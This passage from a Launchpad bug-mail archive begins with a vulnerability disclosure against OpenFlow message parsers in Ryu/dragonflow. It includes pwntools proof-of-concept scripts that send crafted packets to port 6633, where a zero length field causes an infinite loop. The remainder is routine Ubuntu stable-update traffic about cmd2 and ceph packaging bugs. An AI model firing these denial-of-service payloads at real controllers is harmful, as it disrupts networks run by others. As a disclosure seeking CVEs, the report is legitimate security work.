b.len     .... ``` If b.length =0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x01\x30\x7f\xf9\xb1\x6d\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x42\x2c\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc\x3a\xb8\x53\xf8\x80\x00\x06\x06\xce\x8f\xb2\x46\xcb\x5b\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x68\x00\x00\x00\x00\x00\x03\x06\x05\x23\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x62\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2\x46\xcb\x5b\x80\x00\x06\x06\xd2\xfc\x3a\xb8\x53\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x50\x00\x00\x00\x00\x00\x05\x38\x81\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04\x40\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [7] OFPMultipartReply parser ```python class OFPMultipartReply(MsgBase):     _STATS_MSG_TYPES = {}     ....     @classmethod     def parser(cls, datapath, version, msg_type, msg_len, xid, buf):     ....             while offset < msg_len:                 b = stats_type_cls.cls_stats_body_cls.parser(msg.buf, offset)                 body.append(b)                 offset += b.length if hasattr(b, 'length') else b.len     .... ``` If b.length =0,the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x13\x01\x30\x7f\xf9\xb1\x6d\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x42\x2c\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x02\x80\x00\x08\x06\xd2\xfc\x3a\xb8\x53\xf8\x80\x00\x06\x06\xce\x8f\xb2\x46\xcb\x5b\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x01\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x68\x00\x00\x00\x00\x00\x03\x06\x05\x23\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x62\x00\x01\x00\x20\x80\x00\x00\x04\x00\x00\x00\x01\x80\x00\x08\x06\xce\x8f\xb2\x46\xcb\x5b\x80\x00\x06\x06\xd2\xfc\x3a\xb8\x53\xf8\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x02\xff\xe5\x00\x00\x00\x00\x00\x00\x00\x50\x00\x00\x00\x00\x00\x05\x38\x81\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x04\x40\x00\x01\x00\x04\x00\x00\x00\x00\x00\x04\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [8] OFPFlowMod parser ```python class OFPFlowMod(MsgBase): ....         while offset < msg_len:             i = OFPInstruction.parser(buf, offset)             instructions.append(i)             offset += i.len         msg.instructions = instructions ``` If OFPInstruction.len=0 , the offset will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00" p.send(payload) p.interactive() ``` [9] OFPPacketQueue parser ```python class OFPPacketQueue(StringifyMixin): ....     @classmethod     def parser(cls, buf, offset):     ....         while length < len_:             queue_prop = OFPQueueProp.parser(buf, offset)             if queue_prop is not None:                 properties.append(queue_prop)                 offset += queue_prop.len                 length += queue_prop.len         o = cls(queue_id, port, properties)         o.len = len_         return o ``` If OFPQueueProp.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop. poc: ```python from pwn import * p=remote("0.0.0.0",6633) payload="\x04\x17\x00\x50\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x72\x00\x00\x00\x73\x00\x40\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x02\x00\x10\x00\x00\x00\x00\x03\x84\x00\x00\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00\x03\xe7\x00\x00\x00\x00" p.send(payload) p.interactive() ``` Finally, I would like to ask if these vulnerabilities are able to get a corresponding CVE number? To manage notifications about this bug go to: https://bugs.launchpad.net/dragonflow/+bug/2067973/+subscriptions From 1945661 at bugs.launchpad.net Thu Aug 1 13:13:45 2024 From: 1945661 at bugs.launchpad.net (Tom Moyer) Date: Thu, 01 Aug 2024 13:13:45 -0000 Subject: [Bug 1945661] Re: openstack commands fail with GTK3 error References: <163301210934.14066.3726112048219539237.malonedeb@gac.canonical.com> Message-ID: <172251802742.1553895.1859319902370062111.launchpad@juju-98d295-prod-launchpad-4> ** Package changed: python-openstackclient (Ubuntu) => cmd2 (Ubuntu) ** Also affects: cmd2 (Ubuntu Focal) Importance: Undecided Status: New ** Changed in: cmd2 (Ubuntu Focal) Assignee: (unassigned) => Tom Moyer (tom-tom) -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to cmd2 in Ubuntu. https://bugs.launchpad.net/bugs/1945661 Title: openstack commands fail with GTK3 error Status in cmd2 package in Ubuntu: Confirmed Status in cmd2 source package in Focal: New Bug description: Openstack release: Wallaby OS: Ubuntu 20.04 server edition After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: openstack domain create --description "An Example Domain" example Error: Traceback (most recent call last): File "/usr/bin/openstack", line 6, in from openstackclient.shell import main File "/usr/lib/python3/dist-packages/openstackclient/shell.py", line 23, in from osc_lib import shell File "/usr/lib/python3/dist-packages/osc_lib/shell.py", line 24, in from cliff import app File "/usr/lib/python3/dist-packages/cliff/app.py", line 22, in import cmd2 File "/usr/lib/python3/dist-packages/cmd2.py", line 585, in _ = pyperclip.paste() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 667, in lazy_load_stub_paste copy, paste = determine_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 558, in determine_clipboard return init_gi_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 167, in init_gi_clipboard gi.require_version('Gtk', '3.0') File "/usr/lib/python3/dist-packages/gi/__init__.py", line 129, in require_version raise ValueError('Namespace %s not available' % namespace) Had to install GTK3 to make openstack commands work but it is taking huge time to get a response to the commands. The wait time after firing any openstack cli command is around 30 seconds. Anybody faced the issue? What is the fix for it if it exists? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+subscriptions From 1945661 at bugs.launchpad.net Thu Aug 1 13:22:24 2024 From: 1945661 at bugs.launchpad.net (Tom Moyer) Date: Thu, 01 Aug 2024 13:22:24 -0000 Subject: [Bug 1945661] Re: openstack commands fail with GTK3 error References: <163301210934.14066.3726112048219539237.malonedeb@gac.canonical.com> Message-ID: <172251854462.869317.1038101770702615778.malone@juju-98d295-prod-launchpad-3> ** Description changed: + [ Impact ] + + * There is a bug in cmd2 v0.8.5 where an exception is thrown when GTK3 + libraries are not installed. This causes Python applications using + cmd2 to crash unexpectedly + + * This patch backports a fix from upstream that handles that expection + gracefully, allowing applications to function properly. + + * The workaround to this was to install GTK3, which is not ideal as the + Python applications are command line tools, not graphical + + [ Test Plan ] + + * Deploy focal + + * Install an application that has cmd2 as a dependency + e.g. python3-openstackclient + + * Run command that uses cmd2: `openstack server list` + + [ Where problems could occur ] + + * This changes the error handling for a library that is used by many + Python applications. Some of these applications could rely on the + existing behavior (a ValueError exception being thrown) to detect + certain configurations and change their behavior accordingly. + + * This would result in those applications failing under certain use + cases. For example, the configuration in question is a headless + Linux system without GTK libraries installed. + + [ Original bug description ] + Openstack release: Wallaby OS: Ubuntu 20.04 server edition - After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: + After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: openstack domain create --description "An Example Domain" example - Error: + Error: Traceback (most recent call last): File "/usr/bin/openstack", line 6, in from openstackclient.shell import main File "/usr/lib/python3/dist-packages/openstackclient/shell.py", line 23, in from osc_lib import shell File "/usr/lib/python3/dist-packages/osc_lib/shell.py", line 24, in from cliff import app File "/usr/lib/python3/dist-packages/cliff/app.py", line 22, in import cmd2 File "/usr/lib/python3/dist-packages/cmd2.py", line 585, in _ = pyperclip.paste() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 667, in lazy_load_stub_paste copy, paste = determine_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 558, in determine_clipboard return init_gi_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 167, in init_gi_clipboard gi.require_version('Gtk', '3.0') File "/usr/lib/python3/dist-packages/gi/__init__.py", line 129, in require_version raise ValueError('Namespace %s not available' % namespace) Had to install GTK3 to make openstack commands work but it is taking huge time to get a response to the commands. The wait time after firing any openstack cli command is around 30 seconds. Anybody faced the issue? What is the fix for it if it exists? ** Patch added: "lp1945661.debdiff" https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+attachment/5801946/+files/lp1945661.debdiff -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to cmd2 in Ubuntu. https://bugs.launchpad.net/bugs/1945661 Title: openstack commands fail with GTK3 error Status in cmd2 package in Ubuntu: Confirmed Status in cmd2 source package in Focal: New Bug description: [ Impact ] * There is a bug in cmd2 v0.8.5 where an exception is thrown when GTK3 libraries are not installed. This causes Python applications using cmd2 to crash unexpectedly * This patch backports a fix from upstream that handles that expection gracefully, allowing applications to function properly. * The workaround to this was to install GTK3, which is not ideal as the Python applications are command line tools, not graphical [ Test Plan ] * Deploy focal * Install an application that has cmd2 as a dependency e.g. python3-openstackclient * Run command that uses cmd2: `openstack server list` [ Where problems could occur ] * This changes the error handling for a library that is used by many Python applications. Some of these applications could rely on the existing behavior (a ValueError exception being thrown) to detect certain configurations and change their behavior accordingly. * This would result in those applications failing under certain use cases. For example, the configuration in question is a headless Linux system without GTK libraries installed. [ Original bug description ] Openstack release: Wallaby OS: Ubuntu 20.04 server edition After installation of python3-openstackclient from apt, while setting up user, roles and project, I executed following command: openstack domain create --description "An Example Domain" example Error: Traceback (most recent call last): File "/usr/bin/openstack", line 6, in from openstackclient.shell import main File "/usr/lib/python3/dist-packages/openstackclient/shell.py", line 23, in from osc_lib import shell File "/usr/lib/python3/dist-packages/osc_lib/shell.py", line 24, in from cliff import app File "/usr/lib/python3/dist-packages/cliff/app.py", line 22, in import cmd2 File "/usr/lib/python3/dist-packages/cmd2.py", line 585, in _ = pyperclip.paste() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 667, in lazy_load_stub_paste copy, paste = determine_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 558, in determine_clipboard return init_gi_clipboard() File "/usr/lib/python3/dist-packages/pyperclip/__init__.py", line 167, in init_gi_clipboard gi.require_version('Gtk', '3.0') File "/usr/lib/python3/dist-packages/gi/__init__.py", line 129, in require_version raise ValueError('Namespace %s not available' % namespace) Had to install GTK3 to make openstack commands work but it is taking huge time to get a response to the commands. The wait time after firing any openstack cli command is around 30 seconds. Anybody faced the issue? What is the fix for it if it exists? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cmd2/+bug/1945661/+subscriptions From 2065867 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2065867 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2065867] Re: mgr: failed dependency - no module named distutils References: <171585157886.2556480.10076801659665033366.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252119796.2776201.16807723255274550884.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime dependencies in ceph-volume (LP: #2064717). [ James Page ] * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456). * d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging. * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867). -- James Page Sat, 18 May 2024 12:40:36 +0200 ** Changed in: ceph (Ubuntu Noble) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2065867 Title: mgr: failed dependency - no module named distutils Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] dashboard and volume ceph mgr modules fail to activate under Python 3.12 due to use of distutils. [ Test Plan ] sudo snap install --channel latest/edge/core24 microceph sudo microceph cluster bootstrap sudo microceph status for proposed testing we'll bake a core24-proposed snap to test with. [ Where problems could occur ] The proposed patch switches to using the vendored distutils in setuptools for the two imports in the ceph mgr modules that exhibit this issue - this is a minimal fix; codebase really needs refactoring to drop all use of distutils but that's outside of the scope on an SRU update. Other distutils usage gets caught by the distutils_hack that setuptools uses to inject its vendored copy into the distutils module location. [ Original Bug Report ] When running microceph on a core24 base, the ceph-mgr has errors on enabling specific modules - volume and dashboard. $ sudo microceph.ceph status   cluster:     id: 4e3ff87c-5320-4494-9d3c-42e69cc11398     health: HEALTH_WARN             Module 'volumes' has failed dependency: No module named 'distutils'             OSD count 0 < osd_pool_default_size 3   services:     mon: 1 daemons, quorum joplin.glenview.com (age 5s)     mgr: joplin.glenview.com(active, starting, since 0.942931s)     osd: 0 osds: 0 up, 0 in   data:     pools: 0 pools, 0 pgs     objects: 0 objects, 0 B     usage: 0 B used, 0 B / 0 B avail     pgs: distutils as a standalone package was removed from noble - the ceph codebase makes quite a bit of use of distuils still which gets picked up by the distutils_hack in setuptools but not in the context of the mgr daemon. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2065867/+subscriptions From 2065867 at bugs.launchpad.net Thu Aug 1 14:07:02 2024 From: 2065867 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:07:02 -0000 Subject: [Bug 2065867] Update Released References: <171585157886.2556480.10076801659665033366.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252122240.774312.10440671795144487236.malone@juju-98d295-prod-launchpad-7> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2065867 Title: mgr: failed dependency - no module named distutils Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] dashboard and volume ceph mgr modules fail to activate under Python 3.12 due to use of distutils. [ Test Plan ] sudo snap install --channel latest/edge/core24 microceph sudo microceph cluster bootstrap sudo microceph status for proposed testing we'll bake a core24-proposed snap to test with. [ Where problems could occur ] The proposed patch switches to using the vendored distutils in setuptools for the two imports in the ceph mgr modules that exhibit this issue - this is a minimal fix; codebase really needs refactoring to drop all use of distutils but that's outside of the scope on an SRU update. Other distutils usage gets caught by the distutils_hack that setuptools uses to inject its vendored copy into the distutils module location. [ Original Bug Report ] When running microceph on a core24 base, the ceph-mgr has errors on enabling specific modules - volume and dashboard. $ sudo microceph.ceph status   cluster:     id: 4e3ff87c-5320-4494-9d3c-42e69cc11398     health: HEALTH_WARN             Module 'volumes' has failed dependency: No module named 'distutils'             OSD count 0 < osd_pool_default_size 3   services:     mon: 1 daemons, quorum joplin.glenview.com (age 5s)     mgr: joplin.glenview.com(active, starting, since 0.942931s)     osd: 0 osds: 0 up, 0 in   data:     pools: 0 pools, 0 pgs     objects: 0 objects, 0 B     usage: 0 B used, 0 B / 0 B avail     pgs: distutils as a standalone package was removed from noble - the ceph codebase makes quite a bit of use of distuils still which gets picked up by the distutils_hack in setuptools but not in the context of the mgr daemon. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2065867/+subscriptions From 2064717 at bugs.launchpad.net Thu Aug 1 14:06:28 2024 From: 2064717 at bugs.launchpad.net (Launchpad Bug Tracker) Date: Thu, 01 Aug 2024 14:06:28 -0000 Subject: [Bug 2064717] Re: ceph-volume needs "packaging" and "ceph" modules References: <171472547390.1390102.3421238173977349085.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252119599.2776201.16637393260031144375.malone@scripts.lp.internal> This bug was fixed in the package ceph - 19.2.0~git20240301.4c76c50-0ubuntu6.1 --------------- ceph (19.2.0~git20240301.4c76c50-0ubuntu6.1) noble; urgency=medium [ Luciano Lo Giudice] * d/control: Add python3-{packaging,ceph-common} to (Build-)Depends as these are undocumented/detected runtime dependencies in ceph-volume (LP: #2064717). [ James Page ] * d/cephadm.install: Install cephadmlib Python module which the cephadm script uses (LP: #2063456). * d/control: Update Vcs-* to point to Launchpad for Ubuntu packaging. * d/p/mgr-distutils.patch: Directly use vendored distutils from setuptools for Python that runs in the mgr daemon (LP: #2065867). -- James Page Sat, 18 May 2024 12:40:36 +0200 ** Changed in: ceph (Ubuntu Noble) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2064717 Title: ceph-volume needs "packaging" and "ceph" modules Status in Ceph OSD Charm: Fix Released Status in Ceph OSD Charm reef series: Invalid Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] ceph-volume tool is not usable directly after install due to a missing dependencies. [ Test Plan ] sudo apt install ceph-volume ceph-volume --help [ Where problems could occur ] The missing packaging module is immediately obvious - the ceph dependency less so as ceph-volume is usually installed with ceph-osd (which already pulls this in). Direct users of ceph-volume will get new depends pulled in. [ Original Bug Report ] The ceph-volume program needs python3-packaging but it looks like we're not installing it in jammy-caracal https://github.com/ceph/ceph/pull/54423/commits/0985e201342fa53c014a811156aed661b4b8f994 https://openstack-ci-reports.ubuntu.com/artifacts/dcf/917920/4/check/jammy-caracal/dcf9973/index.html Traceback excerpt: 2024-05-02 19:31:54.624912 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 INFO unit.ceph-osd/0.juju-log server.go:316 mon:27: osdize cmd: ['ceph-volume', 'lvm', 'create', '--osd-fsid', 'aef29aff-df24-4bb8-bfb3-bcd607761b2e', '--bluestore', '--data', 'ceph-aef29aff-df24-4bb8-bfb3-bcd607761b2e/osd-block-aef29aff-df24-4bb8-bfb3-bcd607761b2e'] 2024-05-02 19:31:54.624972 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 Traceback (most recent call last): 2024-05-02 19:31:54.624990 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 33, in 2024-05-02 19:31:54.625002 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 sys.exit(load_entry_point('ceph-volume==1.0.0', 'console_scripts', 'ceph-volume')()) 2024-05-02 19:31:54.625014 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/sbin/ceph-volume", line 25, in importlib_load_entry_point 2024-05-02 19:31:54.625189 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return next(matches).load() 2024-05-02 19:31:54.625210 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 171, in load 2024-05-02 19:31:54.625222 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 module = import_module(match.group('module')) 2024-05-02 19:31:54.625234 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module 2024-05-02 19:31:54.625247 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 return _bootstrap._gcd_import(name[level:], package, level) 2024-05-02 19:31:54.625259 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1050, in _gcd_import 2024-05-02 19:31:54.625541 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1027, in _find_and_load 2024-05-02 19:31:54.625598 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 1006, in _find_and_load_unlocked 2024-05-02 19:31:54.625611 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 688, in _load_unlocked 2024-05-02 19:31:54.625622 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 883, in exec_module 2024-05-02 19:31:54.625633 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "", line 241, in _call_with_frames_removed 2024-05-02 19:31:54.625975 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/main.py", line 9, in 2024-05-02 19:31:54.626007 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume import log, devices, configuration, conf, exceptions, terminal, inventory, drive_group, activate 2024-05-02 19:31:54.626057 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/__init__.py", line 1, in 2024-05-02 19:31:54.626072 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . import lvm, simple, raw # noqa 2024-05-02 19:31:54.626280 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/__init__.py", line 1, in 2024-05-02 19:31:54.626313 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from .main import LVM # noqa 2024-05-02 19:31:54.626327 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/main.py", line 4, in 2024-05-02 19:31:54.626339 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from . import activate 2024-05-02 19:31:54.626359 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/devices/lvm/activate.py", line 9, in 2024-05-02 19:31:54.626371 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from ceph_volume.util import encryption as encryption_utils 2024-05-02 19:31:54.626465 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 File "/usr/lib/python3/dist-packages/ceph_volume/util/encryption.py", line 9, in 2024-05-02 19:31:54.626490 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 from packaging import version 2024-05-02 19:31:54.626502 | focal-medium | 2024-05-02 19:31:54 [ERROR] unit-ceph-osd-0.log: 2024-05-02 19:31:52 WARNING unit.ceph-osd/0.mon-relation-changed logger.go:60 ModuleNotFoundError: No module named 'packaging' To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ceph-osd/+bug/2064717/+subscriptions From 2064717 at bugs.launchpad.net Thu Aug 1 14:06:55 2024 From: 2064717 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:06:55 -0000 Subject: [Bug 2064717] Update Released References: <171472547390.1390102.3421238173977349085.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252121570.320285.10168160233848917758.malone@juju-98d295-prod-launchpad-2> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2064717 Title: ceph-volume needs "packaging" and "ceph" modules Status in Ceph OSD Charm: Fix Released Status in Ceph OSD Charm reef series: Invalid Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] ceph-volume tool is not usable directly after install due to a missing dependencies. [ Test Plan ] sudo apt install ceph-volume ceph-volume --help [ Where problems could occur ] The missing packaging module is immediately obvious - the ceph dependency less so as ceph-volume is usually installed with ceph-osd (which already pulls this in). Direct users of ceph-volume will get new depends pulled in. [ Original Bug Report ] The ceph-volume program needs python3-packaging but it looks like we're not installing it in jammy-caracal https://github.com/ceph/ceph/pull/54423/commits/0985e201342fa53c014a811156aed661b4b8f994 